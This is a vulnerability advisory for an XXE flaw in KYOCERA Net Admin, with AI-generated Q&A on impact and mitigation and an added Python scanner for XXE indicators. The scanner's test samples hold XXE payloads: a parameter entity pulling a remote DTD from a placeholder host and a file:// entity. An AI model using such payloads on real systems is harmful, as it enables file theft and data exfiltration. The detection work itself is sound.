CVE-2019-25253
XXE Injection in KYOCERA Net Admin Allows Arbitrary File Access

Publication date: 2025-12-24

Last updated on: 2025-12-24

Assigner: VulnCheck

Description
KYOCERA Net Admin 3.4.0906 contains an XML External Entity (XXE) injection vulnerability in the Multi-Set Template Editor that allows unauthenticated attackers to read arbitrary system files. Attackers can craft a malicious XML file with external entity references to retrieve sensitive configuration data like database credentials through an out-of-band channel attack.
Affected Vendors & Products (2 associated CPEs)
Vendor    Product     Version / Range
kyocera   net_admin   3.4.0906
apache    tomcat      8.5.15
CWE
CWE-611  The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability is an XML External Entity (XXE) injection in the KYOCERA Net Admin 3.4.0906 Multi-Set Template Editor. It occurs because the software improperly sanitizes XML input, allowing an attacker to craft a malicious XML file with external entity references. When processed, this malicious XML can cause the application to read arbitrary files from the system and send their contents to an attacker-controlled server via an out-of-band HTTP channel, without requiring authentication. [1, 2]


How can this vulnerability impact me?

This vulnerability can lead to unauthorized disclosure of sensitive system files and configuration data, such as database credentials. Attackers can exploit it remotely without authentication to exfiltrate sensitive information, potentially compromising the security of the network and devices managed by KYOCERA Net Admin. This poses a significant security risk to administrators and organizations relying on this software for device management. [1, 2]


How can this vulnerability be detected on my network or system? Can you suggest some commands?

Detection of this vulnerability involves monitoring for malicious XML files targeting the Multi-Set Template Editor, especially those containing external entity references or DOCTYPE declarations that load remote DTDs. Network detection can include inspecting outbound HTTP requests for unusual traffic to unknown external servers, which may indicate out-of-band data exfiltration attempts. On the system, checking for suspicious XML files processed by kmmted.exe or monitoring the execution of the Multi-Set Template Editor executable and its ActiveX component for anomalous behavior can help. Specific commands are not provided in the resources, but general approaches include using network traffic analysis tools (e.g., Wireshark) to detect unusual HTTP requests and file integrity monitoring to detect crafted XML files. [1, 2]
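The answer above mentions checking for crafted XML files that carry external entity declarations or DOCTYPE references to remote DTDs, but gives no concrete check. The following is an added example, not code from this record or from KYOCERA: a small scanner that flags the XXE indicators the answer names (external DTD references in the DOCTYPE, external general entities, parameter entities, and remote or file: URIs inside the DTD). The regular expressions are heuristics, the sample documents are constructed for testing the scanner, and the host and path names in them are placeholders.

```python
"""Heuristic scanner for XXE indicators in XML files (added defender-side example)."""
import re
import sys
import tempfile
from pathlib import Path

# Each pattern is an indicator worth a closer look, not proof of exploitation.
INDICATORS = {
    # <!DOCTYPE root SYSTEM "..."> or PUBLIC "...": the whole DTD is fetched externally.
    "external_dtd": re.compile(r"<!DOCTYPE\s+[^\[>]*\b(SYSTEM|PUBLIC)\b", re.IGNORECASE),
    # <!ENTITY name SYSTEM "..."> : a general entity whose value comes from outside.
    "external_entity": re.compile(r"<!ENTITY\s+(?!%)\S+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE),
    # <!ENTITY % name ...> : parameter entities are the usual way to pull a remote DTD.
    "parameter_entity": re.compile(r"<!ENTITY\s+%\s*\S+", re.IGNORECASE),
    # An http/https/ftp URI inside a DOCTYPE or ENTITY declaration.
    "remote_uri_in_dtd": re.compile(r"<!(?:ENTITY|DOCTYPE)[^>]*[\"'](?:https?|ftp)://", re.IGNORECASE),
    # A file: URI inside an ENTITY declaration (local file read).
    "local_file_uri": re.compile(r"<!ENTITY[^>]*[\"']file:", re.IGNORECASE),
}


def scan_xml_text(text):
    """Return the sorted list of indicator names found in an XML document."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_file(path):
    """Scan one file; decoding errors are tolerated so odd encodings do not hide a DTD."""
    return scan_xml_text(Path(path).read_text(encoding="utf-8", errors="replace"))


def scan_directory(root, pattern="*.xml"):
    """Map each matching file under root to its findings, keeping only files with findings."""
    results = {}
    for path in sorted(Path(root).rglob(pattern)):
        findings = scan_file(path)
        if findings:
            results[str(path)] = findings
    return results


# Constructed sample documents (placeholder host and path, not real targets).
BENIGN = '<?xml version="1.0"?>\n<template><name>Default</name></template>\n'
REMOTE_DTD_VIA_PARAM = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE template [\n'
    '<!ENTITY % ext SYSTEM "http://oob.example.invalid/x.dtd">\n'
    '%ext;\n'
    ']>\n<template/>\n'
)
LOCAL_FILE_ENTITY = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE template [\n'
    '<!ENTITY xxe SYSTEM "file:///C:/placeholder/config.xml">\n'
    ']>\n<template>&xxe;</template>\n'
)
EXTERNAL_DTD = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE template SYSTEM "http://oob.example.invalid/t.dtd">\n'
    '<template/>\n'
)


def self_check():
    """Write the samples into a temporary directory and scan it; returns the findings map."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in [("benign.xml", BENIGN), ("param.xml", REMOTE_DTD_VIA_PARAM),
                           ("local.xml", LOCAL_FILE_ENTITY), ("dtd.xml", EXTERNAL_DTD)]:
            Path(tmp, name).write_text(body, encoding="utf-8")
        found = scan_directory(tmp)
    # Strip the temp prefix so callers see stable keys.
    return {Path(k).name: v for k, v in found.items()}


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, findings in scan_directory(root).items():
        print(f"{path}: {', '.join(findings)}")
```

Run it as `python xxe_scan.py <directory>` against the folder where template files are staged; a benign template produces no output, while any DOCTYPE or ENTITY declaration that reaches outside the document is listed by indicator name. Pair the scanner with the outbound-traffic checks the answer describes: a remote DTD fetch is only dangerous if the host processing the template is allowed to reach that server.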


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include restricting access to the Multi-Set Template Editor, especially limiting who can upload or process XML files. Network-level controls such as blocking outbound HTTP requests to untrusted external servers can prevent data exfiltration. Applying any available patches or updates from KYOCERA is recommended, although no vendor response was noted in the advisory. Additionally, disabling or restricting the use of the vulnerable ActiveX component (MultisetTemplateEditorActiveXComponent.dll) and monitoring for suspicious activity related to kmmted.exe can reduce risk. [1, 2]


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

This vulnerability allows unauthenticated attackers to read arbitrary system files and retrieve sensitive configuration data such as database credentials. Such unauthorized disclosure of sensitive information could lead to non-compliance with data protection standards and regulations like GDPR and HIPAA, which require safeguarding sensitive data against unauthorized access. Therefore, exploitation of this vulnerability may result in violations of these compliance requirements due to exposure of confidential information. [1, 2]

